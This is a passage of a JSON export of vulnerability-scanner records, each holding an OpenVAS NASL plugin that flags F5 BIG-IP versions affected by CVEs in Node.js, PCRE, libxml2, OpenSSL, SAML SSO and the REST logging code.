);\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:30:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2216", "CVE-2016-9244"], "description": "The HTTP header parsing code in Node.js 0.10.x before 0.10.42, 0.11.6 through 0.11.16, 0.12.x before 0.12.10, 4.x before 4.3.0, and 5.x before 5.6.0 allows remote attackers to bypass an HTTP response-splitting protection mechanism via UTF-8 encoded Unicode characters in the HTTP header, as demonstrated by %c4%8d%c4%8a.", "modified": "2020-04-03T00:00:00", "published": "2017-03-22T00:00:00", "id": "OPENVAS:1361412562310140205", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140205", "type": "openvas", "title": "F5 BIG-IP - Article: K23134279 - Node.js vulnerability CVE-2016-2216", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - Article: K23134279 - Node.js vulnerability CVE-2016-2216\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140205\");\n script_cve_id(\"CVE-2016-2216\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - Article: K23134279 - Node.js vulnerability CVE-2016-2216\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K23134279\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The HTTP header parsing code in Node.js 0.10.x before 0.10.42, 0.11.6 through 0.11.16, 0.12.x before 0.12.10, 4.x before 4.3.0, and 5.x before 5.6.0 allows remote attackers to bypass an HTTP response-splitting protection mechanism via UTF-8 encoded Unicode characters in the HTTP header, as demonstrated by %c4%8d%c4%8a.\");\n\n script_tag(name:\"impact\", value:\"This vulnerability may allow a remote attacker to bypass an HTTP response-splitting protection mechanism.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 09:40:01 +0100 (Wed, 22 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.6.0-11.6.1;',\n 'unaffected', '11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:25:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5073", "CVE-2016-9244"], "description": "Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.", "modified": "2020-04-03T00:00:00", "published": "2017-03-07T00:00:00", "id": "OPENVAS:1361412562310140179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140179", "type": "openvas", "title": "F5 BIG-IP - PCRE library vulnerability CVE-2015-5073", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - PCRE library vulnerability CVE-2015-5073\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140179\");\n script_cve_id(\"CVE-2015-5073\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - PCRE library vulnerability CVE-2015-5073\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K17331\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.\");\n\n script_tag(name:\"impact\", value:\"A local, authenticated attacker may be able to provide malicious input in the configuration to exploit this vulnerability. There is no data plane exposure to this issue.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 10:27:32 +0100 (Tue, 07 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.3.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.3.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2020-04-07T18:26:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8806", "CVE-2016-9244"], "description": "dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the ", "modified": "2020-04-03T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140193", "type": "openvas", "title": "F5 BIG-IP - libxml2 vulnerability CVE-2015-8806", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140193\");\n script_cve_id(\"CVE-2015-8806\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K04450715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the '<!DOCTYPE html' substring in a crafted HTML document.\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows disruption of service.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 10:24:10 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-07T18:31:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6249", "CVE-2016-9244"], "description": "BIG-IP REST requests which timeout during user account authentication may log sensitive attributes such as password in plaintext to /var/log/restjavad.0.log.", "modified": "2020-04-03T00:00:00", "published": "2017-02-21T00:00:00", "id": "OPENVAS:1361412562310140169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140169", "type": "openvas", "title": "F5 BIG-IP - REST vulnerability CVE-2016-6249", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - REST vulnerability CVE-2016-6249\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140169\");\n script_cve_id(\"CVE-2016-6249\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - REST vulnerability CVE-2016-6249\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K12685114\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"BIG-IP REST requests which timeout during user account authentication may log sensitive attributes such as password in plaintext to /var/log/restjavad.0.log.\");\n\n script_tag(name:\"impact\", value:\"An attacker may be able to gain access to sensitive information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-21 11:12:28 +0100 (Tue, 21 Feb 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.5.0-11.6.1;',\n 'unaffected', '11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:27:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7467", "CVE-2016-9244"], "description": "Traffic may be disrupted or failover initiated when a malformed, signed SAML authentication request from an authenticated user is sent via SP connector on a BIG-IP configured as a SAML Identity Provider.", "modified": "2020-04-03T00:00:00", "published": "2017-03-27T00:00:00", "id": "OPENVAS:1361412562310140223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140223", "type": "openvas", "title": "F5 BIG-IP - TMM SSO plugin vulnerability CVE-2016-7467", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - TMM SSO plugin vulnerability CVE-2016-7467\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140223\");\n script_cve_id(\"CVE-2016-7467\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - TMM SSO plugin vulnerability CVE-2016-7467\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K95444512\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Traffic may be disrupted or failover initiated when a malformed, signed SAML authentication request from an authenticated user is sent via SP connector on a BIG-IP configured as a SAML Identity Provider.\");\n\n script_tag(name:\"impact\", value:\"When the system is exploited, traffic is temporarily disrupted while services restart.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-27 12:44:20 +0200 (Mon, 27 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.6.0-11.6.1_HF1;11.5.4-11.5.4_HF2;',\n 'unaffected', '12.1.2;11.6.1_HF2;11.5.4_HF3;11.4.0-11.5.3;11.2.1;10.2.1-10.2.4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:33:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2182", "CVE-2016-9244"], "description": "The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.", "modified": "2020-04-03T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140192", "type": "openvas", "title": "F5 BIG-IP - OpenSSL vulnerability CVE-2016-2182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - OpenSSL vulnerability CVE-2016-2182\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140192\");\n script_cve_id(\"CVE-2016-2182\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - OpenSSL vulnerability CVE-2016-2182\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K01276005\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows unauthorized disclosure of information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 09:42:43 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.4.0-11.6.1;11.2.1;10.2.1-10.2.4;',\n 'unaffected', '11.6.1_HF2;' );\n\ncheck_f5['LC'] = make_array( 'affected', 